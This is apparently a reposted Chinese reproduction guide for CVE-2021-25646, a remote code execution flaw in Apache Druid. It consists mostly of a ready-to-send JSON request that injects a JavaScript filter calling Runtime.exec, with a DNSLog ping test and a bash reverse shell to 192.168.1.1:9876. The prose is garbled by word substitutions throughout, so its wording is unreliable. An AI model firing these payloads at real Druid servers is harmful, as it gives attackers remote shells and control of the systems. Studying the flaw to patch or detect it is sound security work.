CVE-2021-25646：Apache Druid远程下令实验毛病复现

毛病概述

Apache Druid 是一个分布式的数据处置惩罚体系。Apache Druid包罗实验用户提供的JavaScript的功能嵌入在各种范例哀求中的代码。在Druid 0.20.0及更低版本中，用户发送恶意哀求，利用Apache Druid毛病可以实验恣意代码。攻击者可直接构造恶意哀求实验恣意代码，控制服务器。

影响版本

Apache Druid < 0.20.1

环境搭建

1. docker pull fokkodriesprong/docker-druid
2. docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

复制代码

毛病复现

访问8888端口，进入Apache Druid首页：

点击左上方Load data -> Local disk:

右侧表单填入:
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz

接下来一起点击next，直到下一步是Filter时，抓取数据包：
 

此时更换数据包中POST的data数据，原始数据：

1. {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[]}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

复制代码

更换后的数据：

1. {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
2. "function":"function(value){return java.lang.Runtime.getRuntime().exec('bash -i >& /dev/tcp/192.168.1.1/9876 0>&1')}",
3. "dimension":"added",
4. "":{
5. "enabled":"true"
6. }
7. }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

复制代码

此中，实验下令的代码为：

1. "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.1.1/9876 0>&1')}"

复制代码

DNSLog测试

1. exec('ping xxx.dnslog.cn -c 1')

复制代码

反弹shell

1. exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.1.1/9876 0>&1')

复制代码

乐成反弹shell。

修复发起

升级到最新版Apache Druid 0.20.1
下载链接：https://druid.apache.org/downloads.html

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。